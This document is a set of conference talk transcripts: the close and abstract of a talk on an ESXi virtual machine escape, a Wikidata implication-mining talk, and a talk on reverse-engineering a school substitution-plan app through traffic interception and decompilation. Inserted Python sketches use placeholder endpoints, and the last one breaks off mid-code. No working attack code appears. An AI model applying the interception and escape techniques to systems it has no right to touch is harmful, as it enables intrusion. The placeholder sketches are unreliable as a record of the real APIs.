you only need to use the virtual hardware in your virtual machine. So, any further questions? I'm not seeing anybody at the microphones. Any further questions from the internet? That's it. Could everybody help me in thanking F1YYY for this fantastic talk? Thank you for watching!
VMware ESXi is an enterprise-class, bare-metal hypervisor developed by VMware for deploying and serving virtual computers. As the hypervisor of VMware vSphere, which is the world's most prevailing, state-of-the-art private-cloud software, ESXi plays a core role in the enterprise's cloud infrastructure. Bugs in ESXi could violate the security boundary between guest and host, resulting in virtual machine escape. While a few previous attempts to escape virtual machines have targeted on VMware workstation, there has been no public VMware ESXi escape until our successful demonstration at GeekPwn 2018. This is mainly due to the sandbox mechanism that ESXi has adopted, using its customized filesystem and kernel. In this talk, we will share our study on those security enhancements in ESXi, and describe how we discover and chain multiple bugs to break out of the sandboxed guest machine. During the presentation, we will first share the fundamentals of ESXi hypervisor and some of its special features, including its own customized bootloader, kernel, filesystem, virtual devices and so on. Next, we will demonstrate the attack surfaces in its current implementations and how to uncover security vulnerabilities related to virtual machine escape. In particular, we will anatomize the bugs leveraged in our escape chain, CVE-2018-6981 and CVE-2018-6982, and give an exhaustive delineation about some reliable techniques to manipulate the heap for exploitation, triggering arbitrary code execution in the host context. Meanwhile, due to the existence of sandbox mechanism in ESXi, code execution is not enough to pop a shell. Therefore, we will underline the design of the sandbox and explain how it is adopted to restrict permissions. We will also give an in-depth analysis of the approaches leveraged to circumvent the sandbox in our escape chain. Finally, we will provide a demonstration of a full chain escape on ESXi 6.7.
10.5446/53227 (DOI)
Music. We have Tom and Max here. They have a talk with a very complicated title that I don't quite understand yet: it's called "Interactively Discovering Implicational Knowledge in Wikidata". They told me the point of the talk is that I will understand later what it means, and I hope I will. So good luck! Thank you very much. And have some applause, please.

Thank you very much. Do you hear me? Does it work? Hello? Oh, very good. Thank you very much, and welcome to our talk about interactively discovering implicational knowledge in Wikidata. It is more or less a fun project we started for finding rules that are implicit in Wikidata, entailed just by the data that people have inserted into the Wikidata database so far. We will start with the explicit knowledge, the explicit data in Wikidata, with Max.

So, right. What is Wikidata? Maybe you have heard about Wikidata; then that's all fine. Maybe you haven't, but then surely you've heard of Wikipedia. Wikipedia is run by the Wikimedia Foundation, and the Wikimedia Foundation has several other projects, and one of those is Wikidata. Wikidata is basically a large graph that encodes machine-readable knowledge in the form of statements, and a statement basically consists of some entities that are connected by some property, and these properties can even have annotations on them. So, for example, we have Donna Strickland here, and we encode that she received the Nobel Prize in Physics last year by this property "awarded", and this has a qualifier "time: 2018" and also "for: chirped pulse amplification". All in all we have some 890 million statements on Wikidata that connect 71 million items using 7,000 properties.

But there's also a bit more. We also know that Donna Strickland has field of work optics and also field of work lasers, so we can use the same property to connect one entity with different other entities. And we don't even have to have knowledge that connects two entities: we can have her date of birth, which is 1959, and this is just a plain date and not an entity.

And now, coming from the explicit knowledge, we have some more. We have: Donna Strickland has received the Nobel Prize in Physics, and also Marie Curie has received the Nobel Prize in Physics, and we also know that Marie Curie has a Nobel Prize ID that starts with FIS and then 1903 and some numbers that make up this ID. Then Marie Curie also received the Nobel Prize in Chemistry in 1911, so she has another Nobel Prize ID that starts with CAM and has 1911 in it. And then there's Frances Arnold, who received the Nobel Prize in Chemistry last year, so she has a Nobel Prize ID that starts with CAM and has 2018 in it. And now one could assume that everybody who was awarded a Nobel Prize should also have a Nobel Prize ID, and we could write that as an implication: awarded Nobel Prize implies Nobel Prize ID. And well, if you look sharply at this picture, there's an arrow conspicuously missing: Donna Strickland doesn't have a Nobel Prize ID. And indeed there are 25 people currently on Wikidata that are missing Nobel Prize IDs, and Donna Strickland is one of them.
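Counter-examples of this kind can be pulled from the public Wikidata SPARQL endpoint. Below is a rough sketch of such a query run from Python; the endpoint, P166 (award received), P31/P279 (instance of / subclass of) and P569 (date of birth) are real identifiers, but Q7191 is assumed here to be the Nobel Prize item, and P569 merely stands in for the Nobel Prize ID property used in the talk, whose exact property number is not given there. Treat those two as assumptions to verify.

import requests

ENDPOINT = "https://query.wikidata.org/sparql"

QUERY = """
SELECT ?person ?personLabel WHERE {
  ?person wdt:P166 ?award .                   # award received ...
  ?award wdt:P31?/wdt:P279* wd:Q7191 .        # ... which is (a kind of) Nobel Prize (assumed item)
  FILTER NOT EXISTS { ?person wdt:P569 ?v . } # ... but the expected property is missing (stand-in)
  SERVICE wikibase:label { bd:serviceParam wikibase:language "en". }
}
LIMIT 25
"""

response = requests.get(
    ENDPOINT,
    params={"query": QUERY, "format": "json"},
    headers={"User-Agent": "implication-counterexample-sketch/0.1"},
)
for row in response.json()["results"]["bindings"]:
    print(row["person"]["value"], row.get("personLabel", {}).get("value", ""))

Swapping the stand-in property for the actual Nobel Prize ID property should reproduce the list of missing-ID candidates mentioned above.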
So these people that don't satisfy this implication, we call those counter-examples. And well, if you look at Wikidata on the scale of these 890 million statements, you won't find any counter-examples by hand, because it's just too big, so we need some way to do that automatically. The idea is that if we had this knowledge, that some implications are not satisfied, then this encodes maybe missing information or wrong information, and we want to represent that in a way that is easy to understand and also succinct: it shouldn't take long to write it down, it should have a short representation. That rules out anything involving complex syntax or logical quantifiers, so no SPARQL queries as a description of that implicit knowledge, no description logic, if you've heard of that. We also want something that we can actually compute on actual hardware in a reasonable time frame. And well, our approach is to use Formal Concept Analysis, a technique that has been developed over the past decades to extract what are called propositional implications: just logical formulas of propositional logic that are an implication of the form "awarded Nobel Prize implies Nobel Prize ID". And well, so what exactly is Formal Concept Analysis? Over to Tom.

Thank you. So what is Formal Concept Analysis? It was developed in the 1980s by a guy called Rudolf Wille, together with Bernhard Ganter, and they were restructuring lattice theory. Lattice theory is an ambiguous name in maths, it has two meanings: one meaning is you have a grid and have a lattice there, and the other one is about order relations. So, I like steak, I like pudding, and I like steak more than pudding, and I like rice more than steak; that's an order, right? And lattices are particular orders, which can be used to represent propositional logic, so easy rules like "when it rains, the street gets wet". The data representation those guys used back then, they called it a formal context, which is basically just a set of objects (they just call them objects, it's just a name), a set of attributes, and some incidence, which basically says which object has which attributes. For example, my laptop has the color black, so this object has some property, right? There's a small example on the right of such a formal context. The objects there are some animals: the platypus, that's the fun animal from Australia, a mammal which also lays eggs and which is also venomous; the black widow, the spider; the duck; and the cat. So we see: okay, the platypus has all the properties, it is venomous, lays eggs and is a mammal; the duck is not a mammal but it lays eggs; and so on and so on. And it's very easy to grasp some implicational knowledge here. An easy rule you can find is: whenever you have a mammal that is venomous, it has to lay eggs. So this is a rule that falls out of this binary data table.

Our main problem at this point is that we do not have such a data table for Wikidata, right? We have the implicit graph, which is way more expressive than binary data, and we cannot even store Wikidata as a binary table; even if we tried to, we would have no chance to compute such rules from it. And for this, the people from Formal Concept Analysis proposed an algorithm to extract implicational knowledge from an expert. Our expert here could be Wikidata: it's an expert you can ask questions, right? Using the SPARQL interface you can ask: is there an example for that, is there a counter-example for something else? So the algorithm is quite easy. There is the algorithm and some expert, in our case Wikidata, and the algorithm keeps notes of counter-examples and keeps notes of valid implications. In the beginning we do not have any valid implications, so the list on the right is empty, and in the beginning we do not have any counter-examples, so the list on the left, the formal context to build up, is also empty. And all the algorithm does is ask: is this implication, x implies y, true? Is it true, for example, that an animal that is a mammal and is venomous lays eggs? Now the expert, which in our case is Wikidata, can answer it: we can query that (we showed in our paper that we can query that). So we query it, and if the Wikidata expert does not find any counter-examples, it will say: okay, that's maybe a true thing, yes. Or, if it's not a true implication in Wikidata, it can say: no, no, it's not true, and here's a counter-example. So this is something you contradict by example: you say this rule cannot be true. For example, when the street is wet, it does not mean it has rained; it could have been the cleaning service car or something else.

So our idea now was to use Wikidata as an expert, but also include a human in this loop. We do not just want to ask Wikidata, we also want to ask a human expert as well. So in our tool we first ask the Wikidata expert about some rule, and after that we also inquire of the human expert, and they can say: yeah, that's true, I know that; or: no, Wikidata is not aware of this counter-example, I know one; or the other case: oh, Wikidata says this is true, but I'm aware of a counter-example. And so on and so on. You can represent this more or less as just some mathematical picture; it's not very important, but you can see on the left there's an exploration going on, just Wikidata with the algorithm, and on the right an exploration with a human expert together with Wikidata, which can answer all the queries, and we combine those two into one small tool that is under development. So, back to Max.

Okay, so for that to work we basically need a way of viewing Wikidata, or at least parts of Wikidata, as a formal context. And this formal context, well, this was a binary table, so what do we do? We just take all the items in Wikidata as objects and all the properties as attributes of our context, and then have an incidence relation that says this entity has this property. And then we end up with a context that has 71 million rows and 7,000 columns. So that might actually be a slight problem, because we want something that we can run on actual hardware and not on a supercomputer. So let's maybe not do that, and instead focus on a smaller set of properties that are actually related to one another through some kind of common domain. It doesn't make any sense to have a property that relates to spacecraft and then a property that relates to books; that's probably not a good idea when trying to find implicit knowledge between those two. But two different properties about spacecraft, that sounds good, right? And then the interesting question is just: how do we define the incidence for a set of properties? That actually depends very much on which properties we choose, because for some properties it makes sense to account for the direction of the statement. So there's a property called... actually, it's "child", and then there's "father" and "mother", and you don't want to turn those around: you want "A is a child of B" to be something different than "B is a child of A". Then there are the qualifiers, which might be important for some properties: receiving an award for something might be something different than receiving an award for something else, but receiving an award in 2018 and receiving one in 2017, that's probably more or less the same thing, so we don't necessarily need to differentiate that. And there's also a thing called subclasses, and they form a hierarchy on Wikidata, and you might also want to take that into account, because winning something that is a Nobel Prize also means winning an award itself, and winning the Nobel Peace Prize means winning a peace prize, so there are also implications going on there that you want to respect.

And to see how we actually do that, let's look at an example. We have here, well, this is Donna Strickland, and, I forgot his first name, Ashkin, this is one of the people that won the Nobel Prize in Physics with her last year, and also Gérard Mourou, who is the third one, and they all got the Nobel Prize in Physics last year. So we have all these statements here, and these two have a qualifier that says "with" Gérard Mourou (I don't think the qualifier is on this statement here, actually, but it doesn't really matter). So what we've done here is put all the entities in this small graph as rows in the table: we have Strickland and Mourou and Ashkin, and also Arnold and Curie, who are not in the picture, but you can maybe remember them. And then here we have "awarded", and we scale that by the instance of the different Nobel Prizes that people have won: there's the Physics Nobel in the first column, the Chemistry Nobel Prize in the second column, and just general Nobel Prizes in the third column. There's "awarded" scaled by this "with" qualifier, so "awarded with Gérard Mourou", and then there's "field of work", and we have lasers here and radioactivity, so we scale by the actual field of work that people have. And then if we look at what kind of incidences we get for Donna Strickland: she has a Nobel Prize in Physics, and that is also a Nobel Prize, and she has that together with Gérard Mourou, and she has field of work lasers but not radioactivity. Then Mourou himself has a Nobel Prize in Physics, and that is still a Nobel Prize, but none of the others. Ashkin gets a Nobel Prize in Physics, and that is still a Nobel Prize, and he gets that with Gérard Mourou, and he also works on lasers but not on radioactivity. Frances Arnold has a Nobel Prize in Chemistry, and that is a Nobel Prize. And Marie Curie has a Nobel Prize in Physics and one in Chemistry, and they're both a Nobel Prize, and she also works on radioactivity, but lasers didn't exist back then, so she doesn't get field of work lasers. And basically this table here is a representation of our formal context.

And then we've actually gone ahead and started building a tool where you can interactively do all these things, and it will take care of building the context for you: you just put in the properties. And well, Tom will show you how that works.

So here you see some first screenshots of this tool. Please do not comment on the graphic design, we have no idea about that, we'd have to ask someone; we're just into logics, more or less. On the left you see the initial state of the game: there are five boxes, they're called countries and borders,
credit cards, use of energy, memory in computation, and space launches, which are just presets we defined for this. You can explore, for example, in the case of the credit cards, the properties from Wikidata which are called card network, operator and fee; you can just choose one of them. Or, on the right, custom properties: you can just input whichever Wikidata properties you are interested in, any of the seven thousand you like, or some number of them. On the right I chose the credit card preset, and I now want to show you what happens if you explore these properties.

So the first step in the game is that the exploration process asks: is it true that every entity in Wikidata has these three properties? Are they common among all entities in Wikidata? Which is most probably not true, right? I mean, not everything in Wikidata has a fee, at least I hope so. So what I do now is click the "reject this implication" button: the implication "nothing implies everything" is not true. In the second step, the algorithm tries to find the minimal number of questions to obtain the domain knowledge, that is, to obtain all valid rules in this domain. So the next question is: is it true that everything in Wikidata that has a card network property also has a fee and an operator property? And down here you can see Wikidata says, okay, there are 26 items which are counter-examples, so there are 26 items in Wikidata which have the card network property but do not have the other two. 26 is not a big number; this could mean there's an error, so 26 statements are missing, or maybe that's really the true state of things, which is also okay. But you can now choose what you think is right: you can say, oh, I would say this should be true, or you can say, no, I think that's okay, one of these counter-examples seems valid, let's reject it. I, in this case, rejected it. The next question it asks: is it true that everything that has an operator also has a fee and a card network? Yeah, this is possibly not true; there are also more than 1000 counter-examples, one being, I think, a telecommunications operator in Hungary or something. So we can reject this as well. Next question: everything that has an operator and a card network (card network means Visa, Mastercard, whatever, all this stuff), is it true that they have to have a fee? Hmm, Wikidata says no, it has 23 items that contradict it, but one of the items, for example, is the American Express Gold card. I suppose the American Express Gold has some fee, so this indicates: oh, there's missing data in Wikidata, there is something that Wikidata does not know but should know to reason correctly with your SPARQL queries. So we can now say: yeah, that's not a reject, that's an accept, because we think it should be true, but Wikidata thinks otherwise. And you go on and on; this is then the last question: is it true that everything that has a fee and a card network should have an operator? And you see: no counter-examples. This means Wikidata says this is true; if you ask Wikidata, it says this is a valid implication in the data set so far. Which could also be an indication that something is missing; I'm not aware if this is possible or not, but okay, for me it sounds reasonable: everything that has a fee and a card network should also have an operator, which means a bank or something like that. So I accept this implication, and then, yeah, you have won the exploration game, which essentially means you've won some knowledge. Thank you. And the knowledge is: you know which implications in Wikidata are true or should be true from your point of view. And yeah, this is more or less the state of the game so far, as we programmed it in October. The next step will be to show you how much your opinion of the world differs from the opinion that is now reflected in the data: is what you think about the data close to what is true in Wikidata, or maybe Wikidata has wrong information? You can find that out with this. But Max will tell you more about that.

Okay, so let me just quickly come back to what we have actually done. We offer a procedure that allows you to explore properties in Wikidata and the implicational knowledge that holds between these properties. And the key idea here is that when you look at the implications that you get, there might be some that you don't actually want, because they shouldn't be true, and there might also be ones that you don't get but expect to get, because they should hold. These unwanted and missing implications point to missing statements and items in Wikidata, so they show you where the opportunities to improve the knowledge in Wikidata are. And sometimes you also get to learn something about the world, and in most cases it's that the world is more complicated than you thought it was, and that's just how life is. But in general, implications can guide you in improving Wikidata and the state of knowledge therein.

So what's next? What we currently don't offer in the exploration game, and what we will definitely focus on next, is configurable and filterable counter-examples. Right now you just get a list of a random number of counter-examples, and you might want to search through this list for something you recognize, and you might also want to explicitly say: well, this one should be a counter-example. That's definitely coming next. Then, domain-specific scaling of properties: there's still much work to be done; currently we only have some very basic support for that, so you can have properties, but you can't do the fancy things where you say, well, everything that is an award should be considered as one instance of this property. That's also coming. And then, what Tom mentioned already: compare the knowledge that you have explored through this process against the knowledge that is currently on Wikidata, as a way of seeing where you stand, what is missing in Wikidata, and how you can improve Wikidata. And if you have any more suggestions for features, just tell us; there's a GitHub link on the implication game page, and here's the link to the tool again. So yeah, just let us know, open an issue and have fun. And if you have any questions, then I guess now would be the time to ask. Thank you.

Thank you very much, Tom and Max. So we will switch microphones now, because then I can hand this microphone to you if any of you have a question for our two speakers. Are there any questions or suggestions? Yes. Hi, thanks for the nice talk. I wanted to ask, that's the first question: what's the most interesting implication that you found? Yeah, that would have made for a good backup slide. The most interesting implication so far is the most basic thing you would expect: everything that was launched into space by humans and landed back from space, so everything having a landing date, also has a start date. So nothing landed on Earth which was not started here. Yes? Right now the game only helps you find out implications; are you also planning to have something where I can also add data? Like, for example, let's say I have 25 Nobel laureates who don't have a Nobel laureate ID; are there plans where you could give me a simple interface for me to Google and add that ID? Because it would make the process of adding new data to Wikidata itself more simple. Yes, and that's partly hidden behind this configurable and filterable counter-examples thing. We will probably not have an explicit interface for adding stuff, but most likely interface with some other tool built around Wikidata, so probably something that will give you QuickStatements or something like that. But yes, adding data is definitely on the roadmap. Any more questions? Yes: wouldn't it be nice to do this in other languages too? Yeah, actually it's language-independent. We use Wikidata, and as far as we know Wikidata has no language itself, you know, it has just items and properties, Qs and Ps, and whatever language you use, it should be translated into your language if there is a label for that property or for that item. So if Wikidata is aware of your language, we are. Oh yes, of course, the tool itself still needs to be translated, but that it should be. Hi, thanks for the talk, I have a question: right now you can only find missing data with this, right, or surplus data; do you think we'll be able to find wrong information with a similar approach? Well, it actually does: if Wikidata has a counter-example to something we would expect to be true, this could point to wrong data, right, if the counter-example is a wrong counter-example, if there is a missing or wrongly attached property on an item. Okay, I get to ask a second question: the horizontal axis in the incidence matrix, you said it spans seven thousand columns, right, but it's actually way more columns, because you multiply the properties by the arguments? Yes, if you do any scaling, then of course there will be multiple entries. So that's what you mean with scaling, basically? Yes. You can see here already, seven thousand is way too big to actually compute that. How many would it be if you multiplied all the arguments? I have no idea, probably a few million. Have you thought about a recursive method, where counter-examples can maybe be wrong by other counter-examples, like an argumentation graph or something like this? Actually, I don't get it: how can a counter-example be wrong through another counter-example? Maybe some example says that cats can have golden hair, and then another example might say that this is not a cat, so the property of being a cat or something cat-ish is missing. Then, okay, no, we have not considered deeper reasoning so far. This Horn propositional logic, you know, has no contradictions, because all you can do is contradict by a counter-example, but there can never be a rule that is not true, just in your or my opinion maybe, but not in the logic. But we have to think about it if we want bigger reasoning, right? Sorry, a quick question: because you're not considering all the seven thousand odd properties for each of the entities, what's your current process of filtering what the relevant properties are? I'm sorry, I didn't get that. Well, we basically handpicked those. So you have this input field here where you can go ahead and select your properties; we also have some predefined sets, and there are also some classes for groups of related properties that you could use if you want bigger sets, for example space, or family, or, what was the other one, awards is one. Yeah, it depends on the size of the class: for example, for space it's not that much, it's 10 or 15 properties, it will take you some hours, but you can do it, because it's 15 or something like that, I think. For family it's way too much, it's like 40 or 50 properties. So, a lot of questions; I don't see any more hands. Maybe someone who has not asked a question yet has another one, we could take that; otherwise we would be perfectly on time. And maybe you can tell us where you will be for deeper discussions, where people can find you. Probably at this stage here, yeah, or just running around somewhere. There are also our DECT numbers on the slides, it's 6284 for Tom and 6279 for me, so just call, and, well, we're hanging around. Thank you again, have a round of applause. Thank you.
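The expert's job in the exploration loop described in this talk, answering whether an implication holds and producing counter-examples otherwise, is easy to state in code for a small formal context. Here is a toy sketch using the animals example from earlier; it is not the authors' tool, just an illustration of the check.

# Check an implication "premise -> conclusion" against a small formal context
# and return the counter-examples: objects that have all premise attributes
# but miss some conclusion attribute.

context = {
    "platypus":    {"mammal", "lays eggs", "venomous"},
    "black widow": {"lays eggs", "venomous"},
    "duck":        {"lays eggs"},
    "cat":         {"mammal"},
}

def counterexamples(premise, conclusion):
    return [obj for obj, attrs in context.items()
            if premise <= attrs and not conclusion <= attrs]

# "Every venomous mammal lays eggs" holds in this context ...
print(counterexamples({"mammal", "venomous"}, {"lays eggs"}))   # -> []

# ... while "everything that lays eggs is a mammal" does not.
print(counterexamples({"lays eggs"}, {"mammal"}))               # -> ['black widow', 'duck']

In the exploration game, the same question is answered by Wikidata via SPARQL instead of by a hard-coded table, and a human can then accept the implication anyway or supply a counter-example of their own.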
The ever-growing Wikidata contains a vast amount of factual knowledge. More complex knowledge, however, lies hidden beneath the surface: it can only be discovered by combining the factual statements of multiple items. Some of this knowledge may not even be stated explicitly, but rather hold simply by virtue of having no counterexamples present on Wikidata. Such implicit knowledge is not readily discoverable by humans, as the sheer size of Wikidata makes it impossible to verify the absence of counterexamples. We set out to identify a form of implicit knowledge that is succinctly representable, yet still comprehensible to humans: implications between properties of some set of items. Using techniques from Formal Concept Analysis, we show how to compute such implications, which can then be used to enhance the quality of Wikidata itself: absence of an expected rule points to counterexamples in the data set; unexpected rules indicate incomplete data. We propose an interactive exploration process that guides editors to identify false counterexamples and provide missing data. This procedure forms the basis of [The Exploration Game](https://tools.wmflabs.org/teg/), a game in which players can explore the implicational knowledge of set of Wikidata items of their choosing. We hope that the discovered knowledge may be useful not only for the insights gained, but also as a basis from which to create entity schemata. The talk will introduce the notions of Implicational Knowledge, describe how Formal Context Analysis may be employed to extract implications, and showcase the interactive exploration process.
10.5446/53233 (DOI)
Welcome to the next talk, about free substitution plans for schools. Thank you for translating into German. Let's start. In general, as you know, teachers can't always teach as planned, so schools create a substitution plan. It works like this: schools show the substitution plan on DSB screens from heinekingmedia, and then the schools pay extra for this fantastic web interface here, where you can sign in and view your substitution plans. You can also use this mobile app. It's not really good, though, as I will explain. This is what it looks like. Things are tiny, as you can see. It's obviously proprietary software. It depends on Google Play services. You need to zoom around, you need to scroll around to see all the information, because it's so tiny. So this is really suboptimal. I don't even know why this is so small; if you look at it in a web browser, it zooms fine when you have a small device, so I really don't know how that got screwed up like that. It has useless push notifications, like "new content available", which is not useful. And you have to click at least one time too many, all the time. Due to these issues, I always wanted something that is better than DSBmobile. So I began capturing DSBmobile's network traffic. Surprisingly, on Android this is really easy: you can use user-friendly software like HTTP Canary, which is this one, or Packet Capture, which is this one. It's unfortunately proprietary, but I don't know any non-proprietary software for this; if you know any, please tell me. It acts like a VPN provider app and proxies all the outgoing traffic through itself, installs a certificate in your system so that apps still think the network connection is secure, and then this app decrypts, stores and re-encrypts all the traffic that is going out and in, so you can read it. This is essentially an attacker-in-the-middle attack that you're doing yourself on your own network traffic. Except that on recent Android versions, Android apparently doesn't trust certificates that you install anymore, so you now actually have to have root access to move them to /system/etc/security/cacerts so that they are ultimately trusted. This is unfortunate because it makes it a little more difficult, but on older Android versions it works really easily. With more effort, this capturing of network traffic can be prevented by implementing a kind of certificate pinning, so that the app checks beforehand which certificates it trusts and which it doesn't; with more effort, such a prevention could also be circumvented. But DSBmobile didn't have that, so I could figure out how this endpoint works. As you can see, it's called the "iPhone service", even on Android. Using your user ID and the password, you can request an auth token. It has this form. Actually, that's what it looks like when you have invalid credentials: if it returns this, then your credentials are not valid. It never changes, so I don't know what the use of this token is. However, DSBmobile never stored it, even though it's the same all the time, so it took one extra round-trip time on every login to fetch this never-changing auth token. Using this auth token, you can request your substitution plan URL, and once you have this substitution plan URL, you can access your substitution plan. Okay. So using this knowledge, I developed a client that allows me to directly access just the relevant information, and I call it DSBdirect.
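Here is a rough sketch of the login flow just described: credentials to auth token, token to substitution plan URL, plan URL to HTML. Only this three-step shape is taken from the talk; the endpoint paths, parameter names and the invalid-credentials marker below are placeholders I invented for illustration.

# Hypothetical three-step client for a DSB-style substitution plan service.
# URLs, parameter names and the "invalid credentials" marker are invented
# placeholders, not the real API.
import requests

BASE = "https://example.invalid/iPhoneService"   # placeholder endpoint

def fetch_plan(user_id: str, password: str) -> str:
    session = requests.Session()

    # Step 1: exchange credentials for the (never-changing) auth token
    token = session.get(f"{BASE}/authid",
                        params={"user": user_id, "password": password}).text
    if token == "00000000-0000-0000-0000-000000000000":   # placeholder marker for bad credentials
        raise ValueError("invalid credentials")

    # Step 2: use the token to look up the substitution plan URL
    plan_url = session.get(f"{BASE}/timetableurl", params={"authid": token}).text

    # Step 3: fetch the plan itself (HTML that a parser can then filter)
    return session.get(plan_url).text

# html = fetch_plan("123456", "secret")

Caching the token locally would save the extra round trip the talk complains about, since the token reportedly never changes for a given account.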
The very first thing it did better than DSBmobile is that it didn't display things that tiny. This is a fairly old screenshot. The HTML files the service returns can be parsed with a parser, so you can filter them. You can have useful notifications, which I added later on. It's a native list, not a web view, so it feels better. And of course it's not proprietary but free software. Oh, by the way, this logo is supposed to represent my school's logo, this one. Please don't tell me I did too badly. OK, at least it's different from the DSBmobile logo. The endpoint is fun in other regards, too. The first time I encountered it, it allowed completely unencrypted connections, and the website did not redirect users to HTTPS, so most users would input their username and password and transmit them insecurely. It only supported up to TLS version 1.0, which is obsolete, and it supported SSL version 2, which enables the DROWN attack; I didn't quite understand that one, and apparently it isn't very likely to be exploited here, but it could allow attackers to read your traffic. I informed the company about this on August 11, and I believe this is when I introduced the "not my fault" grumble tag in the issue tracker. They were happy to be informed about it. On August 22 they enabled TLS version 1.2 and disabled SSL version 2, but still allowed insecure connections. I also noticed that they embedded fonts from Google, which is obviously bad for privacy, so I told them about that, twice. On September 19, the iPhone service started returning 404 if the connection was insecure; however, Google Fonts were still embedded. Anyhow, on October 4 the iPhone service was shut down, so I started focusing on the new endpoint that the DSB apps had apparently been using for a while without me noticing, and I had to figure out how its data format works. It looks like this: a JSON body containing a request object, which has a field "data", which is a string. I wanted to figure out how to read this. It looks like base64 once you unescape the slashes, which are of course escaped because it's encoded in JSON. However, just decoding this base64 string did not deliver a nice result, so I had to look for clues by decompiling the app. There are online tools for that. Unfortunately, the app was minified, which means it was obfuscated at compile time, which made the results not very readable: once you have it decompiled, the first function in a class appears as "a", the second one as "b", and so on. Unfortunately, I don't remember exactly how I figured it out from there, so instead we're going to look at whether this was legal or not, because that's interesting too, and I think it was. Let's look at paragraph 69e UrhG, the decompilation provision of the German copyright law. It says that the rightholder's consent is not required when reproducing the code or translating its form, in the sense of paragraph 69c numbers 1 and 2, is indispensable to obtain the information necessary to achieve the interoperability of an independently created computer program with other programs, provided the following conditions are met. And here are three conditions.
The first condition: the acts are performed by the licensee or by another person entitled to use a copy of the program, or on their behalf by a person authorised to do so. In other words, you must have permission to use the program. Yay, I think I'm allowed to use the program; I'm assuming I am, it got paid for. Second: the information necessary to achieve interoperability has not already been made readily available to the persons mentioned in number one. So the information you want to know is not already provided. Yeah, heinekingmedia didn't document this, obviously, so that's their fault. Third: the acts are confined to the parts of the original program which are necessary to achieve interoperability. So you're only decompiling the part that contains the information you want to know. Well, I don't think this Android app is divided into parts, so let's just skip that. The law then goes on to state three things you may not do with the information you gain from decompiling. First, you may not use it for purposes other than achieving the interoperability of the independently created program. So don't use it for anything other than creating interoperability with the independently created program. Yeah, of course, I never used my knowledge for any other reasons. Never. Second, you may not give the information to third parties, except when that is necessary for the interoperability of the independently created program. So don't tell third parties about it unless necessary for interoperability. Well, my free software implementation couldn't be interoperable if the information weren't public, unless it were non-free software, which it is not, obviously. Third, you may not use it for the development, production or marketing of a program that is substantially similar in its expression, or for any other act that infringes copyright. So don't violate the rest of the copyright law. Of course we're not; surely creating an alternative to something, on its own, doesn't violate copyright law, right? So yeah, after doing it, I discovered that I had done so legally. Anyway, I found a usage of some class related to gzip, tried around a bit, and figured out that you could use this command to decode the string. And guess what it is? It's more JSON. What an efficient data format: we're hiding our encoded JSON inside more JSON. Let's look at the data we are sending. Of course, we have a user ID and a password. Besides that, we have a lot of data, apparently for statistics: the app's version, the package ID, the device model, the Android version and API level, the user's language, and the current date. I don't know why they want the date; I think they know when the query arrives. Some of this is redundant with the request headers, like the user agent that is already sent; I don't know why they do that twice. You have the app ID, which is a unique per-installation ID that I at first didn't know how to generate, and you have the push ID, which I assume is an ID generated by Google Play Services to enable push notifications. So it becomes obvious that they are able to link requests together and possibly create usage patterns. What are they doing with this data? No clue. There's no privacy policy anywhere. Which of these fields are required? All of them except the push ID, but most strings can be left empty. So DSBDirect sent the minimal amount of requested data, which is everything, but with empty strings.
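Based on the description above, a decoding helper might look like the following. The gzip-plus-base64 layering matches what the talk describes; the JSON key names (UserId, AppVersion and so on) are illustrative guesses, not the verified wire format.

```python
import base64
import gzip
import json

def decode_data(data_field: str) -> dict:
    # The "data" string turned out to be base64-encoded, gzip-compressed JSON.
    raw = gzip.decompress(base64.b64decode(data_field))
    return json.loads(raw)

def encode_data(payload: dict) -> str:
    # Requests wrap their payload the same way, just in the other direction.
    raw = json.dumps(payload).encode("utf-8")
    return base64.b64encode(gzip.compress(raw)).decode("ascii")

# Minimal request data: every field present, but mostly empty strings,
# as DSBDirect did. Key names here are assumptions for illustration.
payload = {
    "UserId": "123456",
    "UserPw": "secret",
    "AppVersion": "2.5.0",
    "Language": "",
    "OsVersion": "",
    "AppId": "",
    "Device": "",
    "PushId": "",
    "Date": "",
}
request_body = {"req": {"Data": encode_data(payload)}}  # envelope keys are also guesses
```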
And yeah, actually, guess what: this server allows insecure connections again. So something happened. At some point, the server-side verification of this query was changed, and the app version field suddenly became mandatory. I ran some experiments and found examples of valid and invalid version names: these are examples of valid version names, these are examples of invalid version names. Funnily enough, app versions that aren't real versions of heinekingmedia's apps are accepted anyway, like version 7.0.0, when they're only at version 2.5.0, or 2.6.0, I don't remember. So DSBDirect started sending along some app version, its own actually, which was the same as an older DSBmobile release. And because I thought maybe they'd make more server-side changes in the future, I implemented a new system to prevent server-side changes from requiring an app update, because an update would mean I have to write changelogs, F-Droid releases are slow, and the person who was uploading it to Google Play for me also always took a while. Because of that, there was now a "look for a fix" button that reads a news file, which is located at the repository's root and allows me to inform users when they can expect a fix. It also allows me to change the base JSON that the credentials are appended to, which is this one without the user ID and password; they're added to that JSON later. And in case they would start checking the date, I added an option to send the real date. I thought maybe that's what they would do next; they never did, unfortunately. This was the same release as the one with the version number fix, this one. We had good news elsewhere, though. On the same day, October 15, I received an email saying that app.dsbcontrol.de was no longer accessible on port 80 and that the Google fonts were now being loaded locally. This email did not contain the usual "bei Rückfragen können Sie sich gerne direkt an mich wenden" ("if you have further questions, feel free to contact me directly"); maybe they didn't want to hear from me anymore. I couldn't verify it at first; on October 16 I could. A friend noted that they apparently have slow deploy times. Round three: it's October 17, and we're getting an invalid answer from the server again. Now the app ID has to be set to a UUID, and another field has to be set to something non-empty, so we're now sending "Frühstücksei" (breakfast egg). I wasn't aware of how to generate app IDs yet, so I just took the one I had captured from my own device. Contributor Pixelon and I learned all this through trial and error. However, it was very bothersome, because the server sometimes accepted and sometimes rejected the very same query. The slow deploy cycle we'd noticed earlier turned out to be really frustrating: you'd try something and it would work, then you'd remove it again and it wouldn't work anymore, and you'd think that was the cause, when really it was just their slow release and deploy cycle. Or maybe they had just banned this app ID at that point in time and I didn't realize; I'm not sure. Rather, I believe the server was generally struggling and rejecting logins, because my DSBmobile installation with this same app ID was also sometimes rejected. Round four: they seem to have reverted some of these changes later, which reaffirmed my belief that all DSBmobile installations were affected. Contributor Pixelon figured out that the device field was now mandatory, which meant it couldn't be empty. So we sent device "A".
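A rough sketch of how such a "look for a fix" mechanism could work follows. The file name, its location and the JSON keys below are made up for illustration; they are not DSBDirect's actual format, only the idea described in the talk: fetch a small file from the repository so that server-side changes can be countered without shipping an app update.

```python
import json
import urllib.request

# Hypothetical location of the news file at the repository root.
NEWS_URL = "https://example.invalid/dsbdirect/raw/master/news.json"

DEFAULTS = {
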